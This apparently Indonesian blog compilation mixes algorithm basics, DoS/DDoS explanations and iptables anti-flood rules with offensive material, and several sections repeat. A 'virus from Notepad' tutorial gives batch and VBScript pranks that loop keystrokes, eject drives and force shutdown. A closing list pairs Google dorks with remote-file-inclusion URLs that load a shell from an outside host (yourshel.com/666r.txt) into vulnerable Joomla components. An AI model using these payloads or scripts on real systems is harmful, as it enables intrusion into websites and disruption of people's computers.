* Definisi Algoritma
Algoritma merupakan kumpulan-kumpulan perintah dalam menentukan operasi-operasi tertentu dalam menyelesaikan suatu masalah. Dengan kata lain Algoritma adalah Susunan langkah-langkah dalam menyelesaikan suatu persoalan / masalah secara logis (langkah-langkah tersebut benar), efisien (setiap langkah langsung menuju ke tujuan), dan terstruktur (langkah-langkah tersebut tersusun secara berurut dan logis. Perlu diingat bahwa dalam satu algoritma hanya dapat menyelesaikan satu permasalahan saja.^^
Contoh mudah algoritma:
Algoritma TUKAR ISI BEJANA
Soal.
Diberikan dua buah bejana A dan B, bejana A berisi larutan berwarna merah, bejana B berisi larutan berwarna biru. Pertukarkan isi kedua bejana itu sedemikian sehingga bejana A berisi larutan berwarna biru dan bejana B berisi larutan berwarna merah.
Jawab:
– Tuangkan larutan dari bejana A ke dalam bejana B
– Tuangkan larutan dari bejana B ke dalam bejana A.
Jawaban ini adalah salah. Karena Algoritma TUKAR ISI BEJANA di atas tidak dapat menghasilkan pertukaran yang benar. Langkah di atas tidak logis, hasil pertukaran yang terjadi adalah percampuran kedua larutan tersebut.
Untuk mempertukarkan isi dua bejana, diperlukan sebuah bejana tambahan sebagai tempat penampungan sementara, misalnya bejana C. Maka algoritma untuk menghasilkan pertukaran yang benar adalah sebagai berikut :
1. Tuangkan larutan dari bejana A ke dalam bejana C.
2. Tuangkan larutan dari bejana B ke dalam bejana A.
3. Tuangkan larutan dari bejana C ke dalam bejana B.
Jawaban yang benar.
* Ciri algoritma yang benar
1. Algoritma harus dapat berhenti dalam menyelesaikan suatu masalah
2. Setiap langkah harus didefinisikan dengan jelas agar tidak menimbulkan pengertian ganda
3. Algoritma memiliki nol atau lebih masukan
4. Algoritma memiliki nol atau lebih keluaran
5. Algoritma harus efektif
* Hubungan algoritma dengan komputer
Dalam bidang komputer, algoritma sangat diperlukan dalam menyelesaikan masalah pemrograman. Bila suatu algoritma dirancang dengan salah maka proses pemrograman akan menjadi salah dan rusak. Komputer adalah alat bantu untuk menyelesaikan suatu masalah. Dalam menyelesaikan masalah itu harus melalui langkah-langkah penyelesaian masalah dalam sekumpulan instruksi yang dimengerti oleh komputer, biasa disebut program. Atau dengan kata lain manusia dapat berkomunikasi dengan komputer melalui insturksi-instruksi yang diberikan, yang biasa disebut program.
* Transformasi pembentukan program
Ilustrasi proses transformasi pembentrukan program sebagai berikut,
Bahasa Tingkat Tinggi ----> Kompiler / Interpreter ----> Bahasa Assembly ----> Assembler
----> Kode object ----> Program
Rumit bukan? Inilah tahap-tahap transformasi pembentukan program.
1. Mula-mula kode program ditulis dalam bahasa pemograman, bahasa tingkat tinggi. Contoh pemrograman yang terkenal adalah Pascal, C, Java, PhP, Visual Basic.
2. Melalui Kompiler / Interpreter bahasa itu akan diterjemahkan kedalam bahasa assembly yaitu bahasa tingkat menengah.
3. Dari bahasa assembly akan diterjemahkan lagi kedalam bahasa mesin (kode object) yaitu bahasa tingkat rendah melalui assembler.
4. Dari kode object inilah akan terbentuk sebuah program
o Perbedaan Kompiler dengan Interpreter
+ Interpreter adalah metode menerjemahkan baris per baris instruksi untuk kemudian langsung dikerjakan oleh komputer. Jadi apabila ada kesalahan dalam instruksi maka prosesnya akan berhenti di tengah jalan. Contohnya adalah bahasa visual basic yang menerapkan metode ini.
+ Kompiler adalah metode menerjemahkan setelah seluruh instruksi di tulis sebelum dikerjakan oleh komputer. Seluruh instruksi sudah dipastikan dalam kondisi benar sebelum dijalankan. Contohnya adalah Bahasa Pascal, dan C.
Pemrograman adalah suatu cara tentang metodologi pemecahan masalah, untuk menyelesaikan suatu persoalan tertentu. Bahasa pemrograman adalah bahasa yang ditulis dengan memakai suatu bahasa, aturan tata bahasanya, instruksi-instruksinya, dan tata cara pengoperasian untuk membuat program yang ditulis dalam bahasa itu saja. Perlu diingat adalah notasi algoritma bukan merupakan bahasa pemrograman tetapi dapat mudah diterjemahkan kedalam berbagai bahasa pemrograman. ^^
* Contoh-Contoh Algoritma
* Algoritma menjumlahkan 2 buah variabel
* Masukkan nilai variabel A dan B
* MenJumlahkan nilai kedua variabel tersebut dan simpan di variabel c
* Menampilkan hasil penjumlahan
* Proses Selesai
o Algoritma menghitung jari-jari lingkaran
+ Masukkan nilai jari-jari lingkaran
+ Menghitung luas lingkaran
+ Menampilkan luas lingkaran
+ Proses Selesai
algoritma & dasar pemrograman
algoritma : urutan langkah – langkah logis untuk memecahkan suatu permasalahan
jenis- jenis bahasa pemrograman
1.bahasa tingkat rendah
yaitu bahasa pemrograman yang berorientasi pada bahasa mesin
contoh : bahasa assembler
2. bahasa tingkat menengah
yaitu bahasa pemrograman yang berorientasi pada aturan – aturan gramatikal
contoh : bahasa C
3. bahasa tingkattinggi
yaitu bahasa pemrograman yang sudah berorientasi pada bahasa manusia
contoh : bahasa BASIC, PASCAL
4. bahasa yang berorientasi objek
contoh : Visual Basic,delphi
ruang lingkup bidang pemrograman
1. PC base
yaitu bidang pemrograman komputer yang mempunyai fokus untuk merancang suatu aplikasi yang berbasis PC
contoh : Visual Basic, C++
2.web base
yaitu bidang pemrograman komputer yang khusus merancang aplikasi web
contoh : PHP, VB net
membuat virus sederhana dari notepad
Buat sobatyang ingin memulai karirnya dalam bidang virus mem virus mungkin ini bisa menjadi salah satu sarana belajar untuk membuat virus , oke Langsung Coba aja Gan
Pertama-tama buka text editor favorit anda , kalo gak punya bisa pake notepad , setelah itu copy paste scrip di bawah ini kemudian save as type pilih All Files kemudian simpan file dengan format dengan fomat .bat atau .vbs misalnya virus.bat atau virus.vbs
=============================================
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
2. Caps Lock
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
3. CD Rom gila
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
4. Keyboard jadi rusak
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
5. Ngaco
@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN
6. Notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
7. (bingung beri judul apa)
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
8. Pesan lambat
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Y"
WScript.Sleep 500
WshShell.SendKeys "O "
WScript.Sleep 500
WshShell.SendKeys ", U"
WScript.Sleep 500
WshShell.SendKeys "D i"
WScript.Sleep 500
WshShell.SendKeys "e "
WScript.Sleep 500
WshShell.SendKeys "HACK"
WScript.Sleep 500
WshShell.SendKeys "B "
WScript.Sleep 500
WshShell.SendKeys "u "
WScript.Sleep 500
WshShell.SendKeys "G "
WScript.Sleep 500
WshShell.SendKeys "!@#$%^&*()_+_)(*&^%$#@#$%^&*()"
WScript.Sleep 500
WshShell.SendKeys " M"
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "S !!! "
9. Shutdown
@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"
10. tombol truss
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
11. (perhatian virus ini jangan skali2 d coba)
@echo off
msg * YouDie Tralalala Virus Menyebar !!! @#$%^&*()
shutdown -c "Error! Virus Menyebar Keseluruh System!" -s -t 0
Pertama-tama buka text editor favorit anda , kalo gak punya bisa pake notepad , setelah itu copy paste scrip di bawah ini kemudian save as type pilih All Files kemudian simpan file dengan format dengan fomat .bat atau .vbs misalnya virus.bat atau virus.vbs
=============================================
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
2. Caps Lock
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
3. CD Rom gila
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
4. Keyboard jadi rusak
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
5. Ngaco
@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN
6. Notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
7. (bingung beri judul apa)
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
8. Pesan lambat
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Y"
WScript.Sleep 500
WshShell.SendKeys "O "
WScript.Sleep 500
WshShell.SendKeys ", U"
WScript.Sleep 500
WshShell.SendKeys "D i"
WScript.Sleep 500
WshShell.SendKeys "e "
WScript.Sleep 500
WshShell.SendKeys "HACK"
WScript.Sleep 500
WshShell.SendKeys "B "
WScript.Sleep 500
WshShell.SendKeys "u "
WScript.Sleep 500
WshShell.SendKeys "G "
WScript.Sleep 500
WshShell.SendKeys "!@#$%^&*()_+_)(*&^%$#@#$%^&*()"
WScript.Sleep 500
WshShell.SendKeys " M"
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "S !!! "
9. Shutdown
@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"
10. tombol truss
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
11. (perhatian virus ini jangan skali2 d coba)
@echo off
msg * YouDie Tralalala Virus Menyebar !!! @#$%^&*()
shutdown -c "Error! Virus Menyebar Keseluruh System!" -s -t 0
Mencegah serangan Syn & Ping Flood Attack (DOS)
Syn Flooding dan ping flooding merupakan jenis serangan pada sebuah situs atau jaringan internet, lebih tepatnya DOS (Denial Of Service) kadang juga ada yang bilang DDOS (Distributed Denial Of Service). Bedanya yaitu DOS dilakukan dengan satu mesin sedangkan DDOS dilakukan oleh lebih dari satu mesin komputer. Syn Flooding adalah serangan yang dilakukan dengan cara memanfaatkan loophole pada saat koneksi TCP/IP terbentuk, tepatnya memanfaatkan three way handsake pada TCP/IP. Penyerang akan mengirimkan paket-paket SYN ke dalam port-port yang sedang berada dalam keadaan “Listening” dalam host target. paket SYN tersebut dimodifikasi sedemikian rupa hingga tidak valid dalam pengirimannya. ketika paket tersebut dikirimkan terlalu banyak maka akan terjadi pemenuhan paket pada buffer di sistem operasi, dan ini akan mengakibatkan hang pada sebuah server atau tidak akan menerima akses pengguna dalam layanan jaringan.
Sedangkan Ping Flooding adalah serangan yang dilakukan dengan cara mengirimkan paket ICMP yang lebih secara berturut ke sebuah server. paket ICMP tersebut biasanya merupakan pengiriman paket ping dengan jumlah 50000(50028) bytes dari data. ini akan mengakibatkan komputer korban tidak dapat mengirimkan paket data kembali ke dalam jaringan karena komputer korban di banjiri (flood) oleh peket-paket ICMP. Orang-orang sering menyebutnya Smurfing
Ok tudupoin aja, disini saya menggunakan Linux, karena kebanyakan server menggunakannya sebagai layanan jaringan :
1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp --syn -j synjahat
iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP
root(*_*)eXpL01t3r:~# sh closesyn.sh
2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP
root(*_*)eXpL01t3r:~#sh closeping.sh
coba lakukan testing dengan perintah
ping [target] -s 6500
Ok sekian dulu. Thank’s
Sedangkan Ping Flooding adalah serangan yang dilakukan dengan cara mengirimkan paket ICMP yang lebih secara berturut ke sebuah server. paket ICMP tersebut biasanya merupakan pengiriman paket ping dengan jumlah 50000(50028) bytes dari data. ini akan mengakibatkan komputer korban tidak dapat mengirimkan paket data kembali ke dalam jaringan karena komputer korban di banjiri (flood) oleh peket-paket ICMP. Orang-orang sering menyebutnya Smurfing
Ok tudupoin aja, disini saya menggunakan Linux, karena kebanyakan server menggunakannya sebagai layanan jaringan :
1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp --syn -j synjahat
iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP
root(*_*)eXpL01t3r:~# sh closesyn.sh
2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP
root(*_*)eXpL01t3r:~#sh closeping.sh
coba lakukan testing dengan perintah
ping [target] -s 6500
Ok sekian dulu. Thank’s
DoS,Flooding,dan DDoS
DoS
DoS (Denial of Service) adalah jenis serangan yang cukup ditakuti.Why ? Karena serangan ini menghabiskan resource mesin / server dalam jaringan internet sehingga mesin tersebut tidak bisa beroperasi sama sekali (down) dan tidak bisa memberikan service.
Beberapa teknik serangan DoS ; Ping of Death,Smurf Attack,SYN Flooding Attack,Land Attack,UDP Flood,Teardrop.
/me akan jelaskan beberapa teknik serangan DoS tersebut..
1. Ping of Death , menggunakan program utility ping yang ada di sistem operasi komputer. Biasanya ping digunakan untuk men-cek berapa waktu yang dibutuhkan untuk mengirimkan sejumlah data tertentu dari satu komputer ke komputer lain. Panjang maksimum data yang dapat dikirim menurut spesifikasi protokol IP adalah 65,536 byte. Pada Ping of Death data yang dikirim melebihi maksimum paket yang di izinkan menurut spesifikasi protokol IP. Konsekuensinya, pada sistem yang tidak siap akan menyebabkan sistem tersebut crash (tewas), hang (bengong) atau reboot (booting ulang) pada saat sistem tersebut menerima paket yang demikian panjang.Windows NT mampu mengirimkan suatu paket. Dengan hanya mengetik dalam "-165527 ping-s 1 target" kita bisa mengirim seperti ping.Serangan ini sudah tidak baru lagi, semua vendor sistem operasi telah memperbaiki sistem-nya untuk menangani kiriman paket yang oversize.
2. SYN Flooding Attack , Serangan DoS yang menggunakan Paket-paket SYN.Paket-paket SYN adalah salah satu jenis paket dalam protokol Transmission Control Protocol yang dapat digunakan untuk membuat koneksi antara dua host dan dikirimkan oleh host yang hendak membuat koneksi, sebagai langkah pertama pembuatan koneksi dalam proses "TCP Three Way Handshake". Metode ini melakukan 2 operasi yang terpisah. Kedua duanya mencoba untuk memulai 3 way handshake, tetapi tidak menyelesaikannya.
Serangan pertama terjadi ketika si Penyerang mengirimkan SYN request dengan spoofed IP address. Ketika server (korban) mencoba mengirim kembali SYN-ACK request (synchronize-acknowledge request), server tidak menerima respon dari client (si penyerang) atau server tidak pernah menerima ACK dari client dan memaksa server untuk menunggu, sehingga resouces dalam keadaan half-open.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
# Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding. # Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding. # Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server
Trus,beda DoS dengan Flooding ? DoS dengan Flooding itu satu kesatuan,,hmm....gimana yah ngomongnya..Inti dari DoS itu untuk membanjiri traffic dengan mengirimkan banyak paket.Nah,,dari dua penjelasan teknik DoS tadi,,itu adalah Flooding.Tapi,Flooding dengan teknik yang berbeda.Sebenernya DoS itu adalah Flooding dengan banyak teknik seperti yang disebutkan sebelumnya 1
DDoS
DDoS (Distributed Denial of Service) adalah jenis serangan Denial of Service yang terdistribusi.Serangan ini memiliki banyak host penyerang (baik komputer hacker maupun komputer yang "dipaksa") untuk menyerang suatu host jaringan.
Hacker yang melancarkan serangan DDoS harus mempunyai banyak komputer yang siap diperintah.Komputer inilah yang disebut sebagai Zombie,Slave,atau Budak.Hacker akan memerintahkan kepada komputer Zombie melalui komputer perantara yang bertindak sebagai master atau komputernya si Hacker.
Ketika si Hacker ingin melakukan serangan DDoS,ia hanya perlu masuk ke komputer yang bertindak sebagai master tadi.Nah,dari sana,si hacker memberikan perintah kepada zombie-zombie.Semua komputer zombie yang mendengarkan perintah tersebut akan segera melakukan serangan terhadap komputer korban yang telah ditentukan oleh si Hacker.
Untuk melakukan serangan DDoS,harus memiliki banyak zombie (pasukan zombie).Semakin banyak pasukan zombie,maka kekuatannya akan semakin besar.Sederhananya begini,, Jika temen-temen memakai program windows , coba lakukan ini,masuk ke Command Prompt kemudian ketikan :
Ping -t www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t www.situsyangdituju.com
Kemudian komputer akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer mengirimkan ucapan "Oe,ada orang di sana ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang sehingga menyebabkan situs tersebut down.
Serangan DDoS ini adalah serangan yang paling menakutkan dari banyak jenis serangan lain.Situs-situs besar sekalipun tidak bisa menghindari serangan ini.
DoS (Denial of Service) adalah jenis serangan yang cukup ditakuti.Why ? Karena serangan ini menghabiskan resource mesin / server dalam jaringan internet sehingga mesin tersebut tidak bisa beroperasi sama sekali (down) dan tidak bisa memberikan service.
Beberapa teknik serangan DoS ; Ping of Death,Smurf Attack,SYN Flooding Attack,Land Attack,UDP Flood,Teardrop.
/me akan jelaskan beberapa teknik serangan DoS tersebut..
1. Ping of Death , menggunakan program utility ping yang ada di sistem operasi komputer. Biasanya ping digunakan untuk men-cek berapa waktu yang dibutuhkan untuk mengirimkan sejumlah data tertentu dari satu komputer ke komputer lain. Panjang maksimum data yang dapat dikirim menurut spesifikasi protokol IP adalah 65,536 byte. Pada Ping of Death data yang dikirim melebihi maksimum paket yang di izinkan menurut spesifikasi protokol IP. Konsekuensinya, pada sistem yang tidak siap akan menyebabkan sistem tersebut crash (tewas), hang (bengong) atau reboot (booting ulang) pada saat sistem tersebut menerima paket yang demikian panjang.Windows NT mampu mengirimkan suatu paket. Dengan hanya mengetik dalam "-165527 ping-s 1 target" kita bisa mengirim seperti ping.Serangan ini sudah tidak baru lagi, semua vendor sistem operasi telah memperbaiki sistem-nya untuk menangani kiriman paket yang oversize.
2. SYN Flooding Attack , Serangan DoS yang menggunakan Paket-paket SYN.Paket-paket SYN adalah salah satu jenis paket dalam protokol Transmission Control Protocol yang dapat digunakan untuk membuat koneksi antara dua host dan dikirimkan oleh host yang hendak membuat koneksi, sebagai langkah pertama pembuatan koneksi dalam proses "TCP Three Way Handshake". Metode ini melakukan 2 operasi yang terpisah. Kedua duanya mencoba untuk memulai 3 way handshake, tetapi tidak menyelesaikannya.
Serangan pertama terjadi ketika si Penyerang mengirimkan SYN request dengan spoofed IP address. Ketika server (korban) mencoba mengirim kembali SYN-ACK request (synchronize-acknowledge request), server tidak menerima respon dari client (si penyerang) atau server tidak pernah menerima ACK dari client dan memaksa server untuk menunggu, sehingga resouces dalam keadaan half-open.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
# Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding. # Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding. # Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server
Trus,beda DoS dengan Flooding ? DoS dengan Flooding itu satu kesatuan,,hmm....gimana yah ngomongnya..Inti dari DoS itu untuk membanjiri traffic dengan mengirimkan banyak paket.Nah,,dari dua penjelasan teknik DoS tadi,,itu adalah Flooding.Tapi,Flooding dengan teknik yang berbeda.Sebenernya DoS itu adalah Flooding dengan banyak teknik seperti yang disebutkan sebelumnya 1
DDoS
DDoS (Distributed Denial of Service) adalah jenis serangan Denial of Service yang terdistribusi.Serangan ini memiliki banyak host penyerang (baik komputer hacker maupun komputer yang "dipaksa") untuk menyerang suatu host jaringan.
Hacker yang melancarkan serangan DDoS harus mempunyai banyak komputer yang siap diperintah.Komputer inilah yang disebut sebagai Zombie,Slave,atau Budak.Hacker akan memerintahkan kepada komputer Zombie melalui komputer perantara yang bertindak sebagai master atau komputernya si Hacker.
Ketika si Hacker ingin melakukan serangan DDoS,ia hanya perlu masuk ke komputer yang bertindak sebagai master tadi.Nah,dari sana,si hacker memberikan perintah kepada zombie-zombie.Semua komputer zombie yang mendengarkan perintah tersebut akan segera melakukan serangan terhadap komputer korban yang telah ditentukan oleh si Hacker.
Untuk melakukan serangan DDoS,harus memiliki banyak zombie (pasukan zombie).Semakin banyak pasukan zombie,maka kekuatannya akan semakin besar.Sederhananya begini,, Jika temen-temen memakai program windows , coba lakukan ini,masuk ke Command Prompt kemudian ketikan :
Ping -t www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t www.situsyangdituju.com
Kemudian komputer akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer mengirimkan ucapan "Oe,ada orang di sana ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang sehingga menyebabkan situs tersebut down.
Serangan DDoS ini adalah serangan yang paling menakutkan dari banyak jenis serangan lain.Situs-situs besar sekalipun tidak bisa menghindari serangan ini.
INFORMATIKA
suatu bidang keilmuan yang mempelajari teknologi komputer khususnya dalam pengembangan perangkat lunak.
Informatika merupakan salah satu cabang keilmuan yang cukup luas karena hampir mencakup dan terkait dengan berbagai hal tentang kehidupan ini, dimana kumpulan disiplin informatika ini meliputi sains maupun teknik yang secara spesifik mengolah data menjadi informasi dengan memanfaatkan seoptimal mungkin teknologi informasi atau komputer.
Dalam bahasa Indonesia, istilah Informatika diturunkan dari bahasa Perancis informatique, yang dalam bahasa Jerman disebut Informatik. Sebenarnya, kata ini identik dengan istilah computer science di Amerika Serikat dan computing science di Inggris.
Dalam pendefenisian istilah informatika, menurut Philippe Dreyfus (1962) dan l`Academie Francaise (1967) yang mendefenisikan informatika tersebut sebagai berikut:
Kumpulan Disiplin Ilmu (scientific discipline) dan Disiplin Teknik (engineering discipline) yang secara spesifik menyangkut transformasi / pengolahan dari "Fakta Simbolik" (data / informasi), yang terutama menggunakan fasilitas mesin-mesin otomatis/komputer.
Dalam bahasa Inggris memiliki makna yang sedikit berbeda, yaitu lebih menekankan pada aspek pengolahan informasi secara sistematis dan rasional.
Jika dilihat secara menyeluruh dari pengertian informatika di atas, pendekatan logika dan sistematika merupakan ciri yang cukup dominan dari Informatika ini, mengingat pendekatan tersebut merupakan kunci dalam hal mendapatkan solusi dalam menyelesaikan berbagai masalah.
Pada prinsipnya keilmuan ini lebih menekankan bagaimana suatu data dan informasi dapat diolah sedemikian dengan berbantuan teknologi yang terotomatisasi.
Teknologi yang terautomatisasi tersebut tidak hanya dalam satu mesin, namun bisa melibatkan beberapa mesin. Mesin ini lebih umum disebut dengan komputer.
Komputer sebagai bahan utama dalam bidang keilmuan ini memiliki peranan yang sangat tinggi, sehingga informatika secara sederhana mengupas mulai dari bagaimana mesin tersebut bisa bekerja, bagaimana suatu data diolah dengan cara yang dimengerti oleh mesin sedangkan informasinya dimengerti juga oleh manusia, sampai bagaimana mesin tersebut mampu berkomunikasi dengan mesin lainnya.
Dork Google
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:
inurl:\”com_hashcash\”
CODE
:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————————
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_forum\”
